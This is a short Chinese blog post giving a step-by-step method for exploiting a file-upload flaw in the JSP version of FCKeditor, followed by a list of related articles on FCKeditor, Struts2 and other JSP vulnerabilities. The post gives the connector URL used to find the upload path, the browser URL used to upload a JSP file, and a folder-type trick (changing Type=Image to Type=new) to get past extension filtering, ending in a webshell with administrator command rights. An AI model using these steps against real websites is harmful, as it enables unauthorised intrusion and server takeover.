Fckeditor jsp版漏洞利用方法:

最新推荐文章于 2024-03-12 16:44:07 发布
最新推荐文章于 2024-03-12 16:44:07 发布
阅读量422 收藏
点赞数

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F

用这个地址查找上传图片的路径,存在漏洞的话应该返回一个xml文件,如图

1

注意红框的地方,是上传后图片存放的地址。

然后用

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector

这个地址上传jsp文件,如果网站对上传文件的后缀作了限制,那么就新建一个名字为new的文件夹,修改上面url中的Type=Image为Type=new,把文件上传到这个文件夹,这个文件夹一般就不会对文件后缀作限制了。如图:
2

如果一切正常的话,利用这个Fckeditor 的漏洞所获得的jsp webshell应该有cmd管理员权限

版权声明:本文为博主原创文章,未经博主允许不得转载。

iteye_2210
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jsp相关漏洞
qq_44790964的博客
11-25 2122
注入 xss 上传 编辑器 st2漏洞 反序列漏洞 网站容器 弱口令漏洞 Struts漏洞 是Apache基金会jakarta项目组的一个开源项目 .action 可能会存在st2漏洞 漏洞挖掘 单个目标站进行测试 工具爬行 找打存在漏洞地址例如 xx.action (一般存在登录的地方 注册 留言的地方) 可能会存在 用相关工具进行测试即可 批量查找与利用(.do 是jsp的页面) 登录或...
Fckeditor漏洞
zhangpeng999123的博客
03-07 2196
首先是对目标站点进行了基本的测试然后发现了存在fckeditorfckeditor漏洞有很多,基本asp的都被通杀了,大家可以在网上看看。首先看看编辑器的本: $ http://xxxxxxx.com/fckeditor/editor/dialog/fck_about.html 查看本信息: 本信息 可以看到是2.6.6的本,那就对症下药。同时提一下,查看...
Fckeditor上传漏洞
PandaQ的博客
11-02 2803
转自:http://www.chncto.com/heikejishu/10684.html 分享一些关于Fckeditor漏洞利用总结 1.查看编辑器FCKeditor/_whatsnew.html ———————————————————————————————————————————————————————————...
JSP漏洞大观
ncnynl的专栏
09-01 1272
综述:服务器漏洞是安全问题的起源,黑客对网站的攻击也大多是从查找对方的漏洞开始的。所以只有了解自身的漏洞,网站管理人员才能采取相应的对策,阻止外来的攻击。下面介绍一下一些服务器(包括Web服务器和JSP服务器)的常见漏洞。   Apache泄露重写的任意文件漏洞是怎么回事?   在Apache1.2以及以后的本中存在一个mod_rewrite模块,它用来指定特殊URLS在网络服务器文件系统上所映
FCKeditorjsp(软件+教程)
04-21
总的来说,“FCKeditorjsp(软件+教程)”提供了全面的资源,帮助你利用FCKeditor的强大功能构建富文本编辑功能,提升网站用户体验,同时也能通过教程深入理解其工作原理和使用技巧。无论是初学者还是经验丰富的...
JAVA上百实例源码以及开源项目
01-03
 Java局域网通信——飞鸽传书源代码,大家都知道VB、VC还有Delphi的飞鸽传书软件,但是Java的确实不多,因此这个Java文件传输实例不可错过,Java网络编程技能的提升很有帮助。 Java聊天程序,包括服务端和...
JAVA上百实例源码以及开源项目源代码
12-11
Java波浪文字制作方法及源代码 1个目标文件 摘要:Java源码,初学实例,波浪文字 Java波浪文字,一个利用Java处理字符的实例,可以设置运动方向参数,显示文本的字符数组,高速文本颜色,显示字体的 FontMetrics对象,...
java开源包8
06-28
利用Google:maps JSP标签库就能够在你的Web站点上实现GoogleMaps的所有功能而且不需要javascript或AJAX编程。它还能够与JSTL相结合生成数据库驱动的动态Maps。 OAuth 实现框架 Agorava Agorava 是一个实现了 OAuth ...
尝试JSP各种已知漏洞
热门推荐
u012402926的专栏
06-15 1万+
前段时间,应朋友之邀,我对他们托管的三台服务器的主机进行了测试,发现了JSP网站存在的几个问题。   入侵测试第一步:扫描   扫描是入侵的第一步,它可以让你对即将入侵的目标有一个全面的了解。同时扫描还有可能发现扫描对象的漏洞,为入侵提供一个指导方向。   朋友的两台服务器为Linux,一台为Windows系统,在路由器后面还有一台Cisco PIX 525对三台主机进行保护,只允许外部用户
Fckeditor漏洞利用全面解析
weixin_34413802的博客
06-27 520
第一步:查看编辑器FCKeditor/_whatsnew.html ————————————————————————————— 第二步. Version 2.2 本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 ————————————————————————————— 第三步.Version <=2.4.2 For php ...
jsp页面高危漏洞的解决办法
陈正的博客
09-25 1554
&lt;?xml version="1.0" encoding="utf-8"?&gt; &lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt; &lt;%@ page language
JSP中间件漏洞
最新发布
hellodaoyan的博客
03-12 454
jsp的注入最难挖 另外3个好挖。
JSP漏洞大觀
zaowei21的专栏
12-02 2190
 一、源代碼暴露類1.添加特殊尾碼引起 jsp源代碼暴露  在jsp中也存在著和asp這些漏洞類似的問題,如IBM Websphere Application Server 3.0.21、BEA Systems Weblogic 4.5.1、Tomcat3.1等jsp文件尾碼大寫漏洞jsp 文件後加特殊字元如Resin1.2的%82、../漏洞;ServletExec的%2E、+漏洞等等。  例
文件包含漏洞
weixin_46273733的博客
01-15 741
文件包含漏洞 PHP包含 PHP中提供了四个文件包含的函数,分别是 include()、include once()、require()和require_once()。这四个函数都可以进行文件包含,但作用却不一样,其区别如下: 文件包含示例 本地包含 Local File Include (LFI) Index.php对ArrayUtil.php进行包含,并且使用PrintArr 函数 phpinfo.txt文件
文件上传(包括编辑器上传)漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
weixin_42075643的博客
03-28 3839
文件上传绕过总结;编辑器文件上传;渗透测试记录
FCKeditor编辑器漏洞
谢公子的博客
04-07 4584
目录 FCKeditor asp网页 aspx网页 php网页 jsp网页 FCKeditor FCKeditor是一个功能强大支持所见即所得功能的文本编辑器,可以为用户提供微软office软件一样的在线文档编辑服务。它不需要安装任何形式的客户端,兼容绝大多数主流浏览器,支持ASP.Net、ASP、ColdFusion 、PHP、Java、Active-FoxPro、Lasso、P...
某教程学习笔记(一):18、JSP漏洞
weixin_41489908的博客
03-06 581
小县城里的稳定工作,身边的三五好友,晚饭过后出去喝点小酒,聊聊人生,迷茫又安稳。。。 ---- 网易云热评 一、Struts2漏洞 1、在交互页面找到**.action页面 2、打开K8 struts2,将目标地址放进去 3、选择不同的漏洞获取信息,如下则存在漏洞,接着就可以文件上传了 4、其他漏洞检测工具 二、java反序列漏洞 1、存在漏洞的jboss网站 2、将地址复制到工具的目...
fckeditor编辑器漏洞
D1stiny的博客
04-07 3286
查看fckeditor编辑器本 /_whatsnew.html /editor/dialog/fck_about.html 查出本信息之后就可以到网上搜相应的漏洞 version2.2 Apache+linux 环境下在上传文件后面加个.突破 version<=2.4.2 For php 该本在处理PHP上传的地方没有对Media类型进行上传文件类型的控制,导致用户上传任意...
FCKeditor PHP文件上传漏洞分析与利用
"FCKeditor文件上传漏洞利用-File-Upload-Vulnerability-in-FCKEditor1" FCKeditor(现称为CKeditor)是CKSource公司的一款开源的所见即所得(WYSIWYG)文本编辑器,可以集成到网络应用中,为用户提供类似文字...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值